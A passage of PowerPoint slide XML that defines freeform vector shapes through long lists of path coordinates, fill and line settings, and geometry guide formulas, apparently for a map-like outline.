                      <a:pt x="80" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36408" name="Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3478" y="1884"/>
                <a:ext cx="648" cy="354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 515 w 648"/>
                  <a:gd name="T1" fmla="*/ 309 h 354"/>
                  <a:gd name="T2" fmla="*/ 467 w 648"/>
                  <a:gd name="T3" fmla="*/ 305 h 354"/>
                  <a:gd name="T4" fmla="*/ 430 w 648"/>
                  <a:gd name="T5" fmla="*/ 304 h 354"/>
                  <a:gd name="T6" fmla="*/ 398 w 648"/>
                  <a:gd name="T7" fmla="*/ 308 h 354"/>
                  <a:gd name="T8" fmla="*/ 380 w 648"/>
                  <a:gd name="T9" fmla="*/ 323 h 354"/>
                  <a:gd name="T10" fmla="*/ 351 w 648"/>
                  <a:gd name="T11" fmla="*/ 348 h 354"/>
                  <a:gd name="T12" fmla="*/ 338 w 648"/>
                  <a:gd name="T13" fmla="*/ 342 h 354"/>
                  <a:gd name="T14" fmla="*/ 312 w 648"/>
                  <a:gd name="T15" fmla="*/ 314 h 354"/>
                  <a:gd name="T16" fmla="*/ 247 w 648"/>
                  <a:gd name="T17" fmla="*/ 293 h 354"/>
                  <a:gd name="T18" fmla="*/ 141 w 648"/>
                  <a:gd name="T19" fmla="*/ 339 h 354"/>
                  <a:gd name="T20" fmla="*/ 99 w 648"/>
                  <a:gd name="T21" fmla="*/ 326 h 354"/>
                  <a:gd name="T22" fmla="*/ 98 w 648"/>
                  <a:gd name="T23" fmla="*/ 313 h 354"/>
                  <a:gd name="T24" fmla="*/ 86 w 648"/>
                  <a:gd name="T25" fmla="*/ 306 h 354"/>
                  <a:gd name="T26" fmla="*/ 74 w 648"/>
                  <a:gd name="T27" fmla="*/ 291 h 354"/>
                  <a:gd name="T28" fmla="*/ 61 w 648"/>
                  <a:gd name="T29" fmla="*/ 268 h 354"/>
                  <a:gd name="T30" fmla="*/ 78 w 648"/>
                  <a:gd name="T31" fmla="*/ 268 h 354"/>
                  <a:gd name="T32" fmla="*/ 78 w 648"/>
                  <a:gd name="T33" fmla="*/ 251 h 354"/>
                  <a:gd name="T34" fmla="*/ 107 w 648"/>
                  <a:gd name="T35" fmla="*/ 252 h 354"/>
                  <a:gd name="T36" fmla="*/ 105 w 648"/>
                  <a:gd name="T37" fmla="*/ 233 h 354"/>
                  <a:gd name="T38" fmla="*/ 103 w 648"/>
                  <a:gd name="T39" fmla="*/ 216 h 354"/>
                  <a:gd name="T40" fmla="*/ 81 w 648"/>
                  <a:gd name="T41" fmla="*/ 213 h 354"/>
                  <a:gd name="T42" fmla="*/ 47 w 648"/>
                  <a:gd name="T43" fmla="*/ 225 h 354"/>
                  <a:gd name="T44" fmla="*/ 40 w 648"/>
                  <a:gd name="T45" fmla="*/ 221 h 354"/>
                  <a:gd name="T46" fmla="*/ 15 w 648"/>
                  <a:gd name="T47" fmla="*/ 194 h 354"/>
                  <a:gd name="T48" fmla="*/ 10 w 648"/>
                  <a:gd name="T49" fmla="*/ 163 h 354"/>
                  <a:gd name="T50" fmla="*/ 22 w 648"/>
                  <a:gd name="T51" fmla="*/ 135 h 354"/>
                  <a:gd name="T52" fmla="*/ 39 w 648"/>
                  <a:gd name="T53" fmla="*/ 126 h 354"/>
                  <a:gd name="T54" fmla="*/ 70 w 648"/>
                  <a:gd name="T55" fmla="*/ 101 h 354"/>
                  <a:gd name="T56" fmla="*/ 97 w 648"/>
                  <a:gd name="T57" fmla="*/ 105 h 354"/>
                  <a:gd name="T58" fmla="*/ 127 w 648"/>
                  <a:gd name="T59" fmla="*/ 127 h 354"/>
                  <a:gd name="T60" fmla="*/ 146 w 648"/>
                  <a:gd name="T61" fmla="*/ 128 h 354"/>
